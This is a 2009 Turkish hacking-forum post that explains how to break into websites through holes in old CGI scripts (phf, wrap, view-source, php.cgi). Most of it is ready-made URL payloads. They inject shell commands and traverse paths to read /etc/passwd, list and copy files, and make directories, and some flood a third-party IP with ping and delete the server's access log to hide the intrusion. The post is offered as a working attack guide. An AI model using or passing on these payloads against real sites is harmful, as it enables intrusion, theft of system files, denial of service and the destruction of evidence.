Derebahçe ~ GençliK
Hoşgeldiniz !
Üye olmadan forumdan yarar sağlayamazsınız.
Canlı konuşma için sitede başlık sayfasının altındaki chat box'a konuşabilirsiniz !
Moderatör Alımları Başlamıştır.
İyi Eğlenceler..



 
AnasayfaaFFéTméZ ~ TéaMKayıt OlGiriş yap

Paylaş | 
 

 Siteleri Cgi/bin Aciklarindan Yaralanip Kirmak

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
By.BiCi
Admin
Admin


Rep Gücü : 401
Rep Puanı : 10

MesajKonu: Siteleri Cgi/bin Aciklarindan Yaralanip Kirmak   Salı Mart 17, 2009 9:57 pm

:: SITELERI CGI/BIN ACIKLARINDAN YARALANIP KIRMAK ::
a- (Phf scripti): Pek cok web ana bilgisayari CGI-BIN guvenli?inden
yoksundur. Bir de bunun uzerine sistem yöneticilerinin CGI-BIN guvenlik
aciklarini bilmemesi potansiyel sistem aciklarina yol acmaktadir. Tum
dunyada pek cok hacker'in kullandi?i cgi-bin guvenlik aci?i:
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd
Fakat bazi uyanik sistem yöneticileri phf komutunun kullanimini
sinirlamislardir. Bu yuzden bu komutu calistiramayabilirsiniz. Fakat yine
de alternatif web makinalari uzerinde denemekte yarar var.
b- (Wrap Scripti): Irix isletim sisteminin 6.2 versiyonunda rastlanan bu
hatayi da söyle istismar edebiliriz:
http://www.kiraca?imizadres.com.tr/cgi-bin/wrap?../../../etc/passwd
http://www.kiraca?imizadres.com.tr/cgi-bin/wrap?%0als (...)
Dikkat edece?imiz tek nokta bu hata sadece IRIX 6.2'de var. !!
c- (View Source Scripti): Denemek serbest (basariya ulasabilme
ihtimali kadar ulasamama ihtimali de var)
http://www.kiraca?imizadres.com.tr/cgi-bin/view-source?../../../etc/passwd
ya da
http://www.kiraca?imizadres.com.tr/cgi-bin/view-source?%1b or
%0a %20
d- (php.cgi Scripti):
http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd
e- Di?er Denenebilir Scriptler:
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s
%205000%20ip%20to%20shoot
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go
http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate

<B>http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log
__________________


Sayfa başına dön Aşağa gitmek
 
Siteleri Cgi/bin Aciklarindan Yaralanip Kirmak
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Bundesliga Takımlarının Resmi Web Siteleri

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
Derebahçe ~ GençliK :: Hacking area :: Web-Domain Hacking-
Buraya geçin: